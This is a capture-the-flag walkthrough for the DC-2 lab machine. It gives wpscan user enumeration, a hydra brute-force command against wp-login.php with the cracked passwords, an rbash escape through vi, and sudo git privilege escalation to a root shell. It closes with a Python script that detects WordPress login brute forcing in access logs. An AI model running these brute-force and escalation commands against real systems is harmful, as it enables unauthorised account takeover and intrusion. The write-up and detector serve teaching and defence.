DC‑2 is a WordPress machine where user enumeration and password brute forcing lead to SSH access.
Privilege escalation is achieved via git abuse with sudo.
Target: DC‑2
Initial vector: WordPress → wpscan → hydra → SSH
Privilege escalation: sudo git → GTFOBins
Identify WordPress:
Source: WordPress 4.7.10
Enumerate users:
$ wpscan --url http://dc-2 --enumerate
-> admin, tom, jerry
Brute force passwords:
$ hydra -L users.txt -P dict-5.txt 192.168.159.194 \
    http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:incorrect" -t 64
-> tom:parturient
-> jerry:adipiscing
SSH as tom:
$ ssh tom@dc-2
Shell is restricted (rbash). Bypass via vi:
$ vi
:set shell=/bin/bash
:shell
Switch to jerry:
$ su jerry
Password: adipiscing
Check sudo:
$ sudo -l
-> /usr/bin/git
Use GTFOBins for git:
$ sudo git -p help config
!/bin/bash
# id; whoami
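
Detection side of the wp-login.php brute force step above, as an added example that is not part of the original writeup: it scans a web access log for bursts of failed WordPress logins from one source and reports whether a successful login followed. It assumes combined log format and relies on WordPress answering a rejected login POST with 200 and an accepted one with a 302 redirect; the window, threshold, function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# ip, timestamp, method, path, status from a combined-format access log line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
WINDOW = timedelta(seconds=60)   # assumed tuning values, adjust per site
THRESHOLD = 10

def detect_wp_bruteforce(log_text, window=WINDOW, threshold=THRESHOLD):
    """Return {ip: {"max_failures": n, "login_after_burst": bool}} for noisy sources."""
    recent = defaultdict(deque)      # ip -> timestamps of failed logins inside the window
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        if method != "POST" or path.split("?")[0] != "/wp-login.php":
            continue
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        if status == "200":          # login form re-rendered: credentials rejected
            q = recent[ip]
            q.append(when)
            while when - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                f = findings.setdefault(ip, {"max_failures": 0, "login_after_burst": False})
                f["max_failures"] = max(f["max_failures"], len(q))
        elif status == "302" and ip in findings:
            findings[ip]["login_after_burst"] = True   # redirect after a burst: likely guessed password
    return findings

def _line(ip, sec, method, path, status):
    """Build one constructed log line (documentation-range IPs, invented times)."""
    return (f'{ip} - - [01/Jan/2024:10:00:{sec:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 1234 "-" "-"')

# Constructed sample: one source fails 12 times then succeeds; another logs in normally.
SAMPLE_LOG = "\n".join(
    [_line("192.0.2.10", s, "POST", "/wp-login.php", 200) for s in range(12)]
    + [_line("192.0.2.10", 12, "POST", "/wp-login.php", 302),
       _line("198.51.100.7", 20, "POST", "/wp-login.php", 200),
       _line("198.51.100.7", 25, "POST", "/wp-login.php", 302),
       _line("198.51.100.7", 26, "GET", "/wp-admin/", 200)]
)

if __name__ == "__main__":
    print(detect_wp_bruteforce(SAMPLE_LOG))
```

A source reported with login_after_burst set is the case to treat as a compromised account rather than noise: reset that user's password and review what else the same credentials unlock, such as SSH.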